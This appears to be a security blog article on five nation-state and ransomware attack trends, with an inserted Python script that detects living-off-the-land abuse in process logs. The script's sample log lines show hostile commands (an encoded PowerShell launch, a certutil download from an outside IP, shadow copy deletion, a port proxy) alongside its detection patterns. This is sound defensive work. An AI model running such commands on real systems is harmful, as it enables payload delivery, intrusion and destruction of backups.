Cyber security is constantly evolving and, as such, requires regular vigilance.
Microsoft analyzes more than 78 trillion security signals every day to better understand the latest attack vectors and techniques. Compared to last year, we have noticed a change in how threat actors act, expand, and leverage the support of nation states. It is clear that organizations continue to suffer more attacks than ever and that attack chains are becoming increasingly complex. Dwell times have shortened, and tactics, techniques and procedures (TTPs) have evolved to become more agile and evasive.
Based on these insights, here are five attack trends that end-user organizations should monitor regularly.
Become stealthy by avoiding custom tools and malware
Some threat actor groups are prioritizing stealth by leveraging tools and processes that already exist on their victims’ devices. This lets adversaries slip under the radar and go undetected, because their activity blends in with legitimate use of those tools and with other threat actors who use the same methods to launch attacks.
An example of this trend is Volt Typhoon, a Chinese state-sponsored actor that made headlines for targeting U.S. critical infrastructure with living-off-the-land techniques.
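Because living-off-the-land activity uses binaries that are already present and legitimately used, detection has to look at how a built-in tool is invoked rather than whether it is present. The script below is an added illustration, not code from the original article or from Microsoft: it scans constructed process-creation log lines (a hypothetical pipe-delimited format of timestamp, host, parent image, image and command line) for a small starter list of commonly abused built-in binaries and flags only those invocations that also carry a suspicious command-line trait or an unusual parent process. The binary list, the patterns and the log lines are all assumptions made for the example; a real deployment would draw them from a maintained catalogue and from its own telemetry.

```python
"""Flag living-off-the-land (LOTL) activity in process-creation logs.

Added illustration; not code from the original article or from Microsoft.
Assumptions (all constructed for this example): a pipe-delimited log
format 'timestamp|host|parent_image|image|command_line', a small starter
list of commonly abused built-in binaries, and a handful of command-line
traits. A real deployment would draw these from a maintained catalogue.
"""
import re
from dataclasses import dataclass, field

# Legitimate Windows binaries that adversaries reuse instead of dropping
# malware. Hypothetical starter set, not an exhaustive list.
LOLBINS = {
    "powershell.exe", "certutil.exe", "wmic.exe", "mshta.exe",
    "regsvr32.exe", "bitsadmin.exe", "netsh.exe",
}

# Command-line traits that turn a legitimate binary into a suspicious event.
# Dict order matters: reasons are reported in this order.
SUSPICIOUS_PATTERNS = {
    "encoded-command": re.compile(r"(?<!\S)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote-download": re.compile(r"(?:-urlcache|downloadstring|downloadfile|/transfer)\b.*https?://", re.I),
    "script-proxy-execution": re.compile(r"(?:/i:|scrobj\.dll|vbscript:|javascript:)", re.I),
    "shadow-copy-delete": re.compile(r"shadowcopy\s+delete", re.I),
    "port-proxy": re.compile(r"portproxy\s+add", re.I),
}

# Parents that rarely have a legitimate reason to launch a LOLBin directly.
USER_FACING_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe", "msedge.exe"}


@dataclass
class Finding:
    host: str
    image: str
    reasons: list = field(default_factory=list)


def basename(path):
    """Return the lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_line(line):
    """Split one constructed log line into its five fields, or None if malformed."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        return None
    ts, host, parent, image, cmd = parts
    return {"ts": ts, "host": host, "parent": parent, "image": image, "cmd": cmd}


def classify(event):
    """Return the reasons an event looks like LOTL abuse (empty list if benign)."""
    reasons = []
    if basename(event["image"]) not in LOLBINS:
        return reasons  # not a binary this rule set cares about
    for name, pattern in SUSPICIOUS_PATTERNS.items():
        if pattern.search(event["cmd"]):
            reasons.append(name)
    if basename(event["parent"]) in USER_FACING_PARENTS:
        reasons.append("user-facing-parent")
    return reasons


def scan(lines):
    """Run classify() over every line and collect the flagged events."""
    findings = []
    for line in lines:
        event = parse_line(line)
        if event is None:
            continue
        reasons = classify(event)
        if reasons:
            findings.append(Finding(event["host"], basename(event["image"]), reasons))
    return findings


# Constructed sample log: the first two lines are benign (plain use of a
# built-in tool is not flagged on its own), the remaining four are not.
SAMPLE_LOG = [
    r"2024-03-01T10:00:00Z|WS01|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe report.txt",
    r"2024-03-01T10:01:00Z|WS01|C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe Get-ChildItem C:\Users",
    r"2024-03-01T10:02:00Z|WS01|C:\Program Files\Microsoft Office\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    r"2024-03-01T10:03:00Z|SRV02|C:\Windows\System32\cmd.exe|C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f http://198.51.100.7/update.bin C:\Users\Public\update.bin",
    r"2024-03-01T10:04:00Z|SRV02|C:\Windows\System32\services.exe|C:\Windows\System32\netsh.exe|netsh interface portproxy add v4tov4 listenport=8443 connectaddress=10.0.0.5 connectport=443",
    r"2024-03-01T10:05:00Z|SRV02|C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\wmic.exe|wmic shadowcopy delete",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.host}: {f.image} flagged for {', '.join(f.reasons)}")
```

The design point is the second sample line: a plain PowerShell directory listing is not flagged, because alerting on every use of a built-in tool would bury analysts in noise. Only the combination of an abused binary with a suspicious argument pattern (an encoded command, a download to disk, a port proxy, shadow copy deletion) or an unusual parent such as a word processor produces a finding.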
Combining cyber and influence operations for greater impact
State actors have also created a new category of tactics that combines cyber operations with influence operations (IO). Known as “cyber-enabled influence operations,” this hybrid pairs cyber methods (such as data theft, defacement, distributed denial of service and ransomware) with influence methods (such as data leaks, sockpuppets, victim impersonation, misleading social media posts and malicious SMS/email communications) to enhance, exaggerate, or compensate for shortfalls in adversaries’ network access or cyberattack capabilities.
For example, Microsoft observed several Iranian actors attempting to use bulk SMS messaging to increase the amplification and psychological effect of their cyber-enabled influence operations. We are also seeing more of these operations impersonate the alleged victim organizations, or senior figures in those organizations, to lend credibility to the claimed effects of the cyberattack or compromise.
Create hidden networks by targeting SOHO network edge devices
Particularly relevant to distributed or remote employees is the growing abuse of small office/home office (SOHO) network edge devices. We increasingly see threat actors compromising SOHO devices, like the router at a local coffee shop, to assemble covert networks. Some adversaries even use programs that locate vulnerable devices around the world to identify starting points for their next attack. This technique complicates attribution, since attacks appear to originate from virtually anywhere.
Rapid adoption of publicly disclosed POCs for initial access and persistence
Microsoft has increasingly observed certain nation-state actors adopting publicly disclosed proof-of-concept (POC) code soon after its release to exploit vulnerabilities in Internet-facing applications.
This trend can be seen in threat groups such as Mint Sandstorm, an Iranian nation-state actor that quickly weaponized N-day vulnerabilities in common enterprise applications and conducted highly targeted phishing campaigns to rapidly gain access to environments of interest.
Prioritize specialization in the ransomware economy
We have observed a continued move toward ransomware specialization. Instead of running an end-to-end ransomware operation, threat actors choose to focus on a narrow range of capabilities and services.
This specialization has a fragmenting effect, spreading the components of a ransomware attack across multiple vendors in a complex shadow economy. Organizations can no longer think of ransomware attacks as coming from a single actor or threat group; they are instead up against an entire ransomware-as-a-service economy. In response, Microsoft Threat Intelligence now tracks ransomware vendors individually, identifying which groups traffic in initial access and which offer other services.
As cyber defenders look for more effective ways to strengthen their security posture, it is important to reference and learn from trends and significant breaches of years past. By analyzing these incidents and understanding different adversaries’ motivations and favored TTPs, we can better prevent similar breaches from occurring in the future.
To learn more: Partner perspectives from Microsoft Security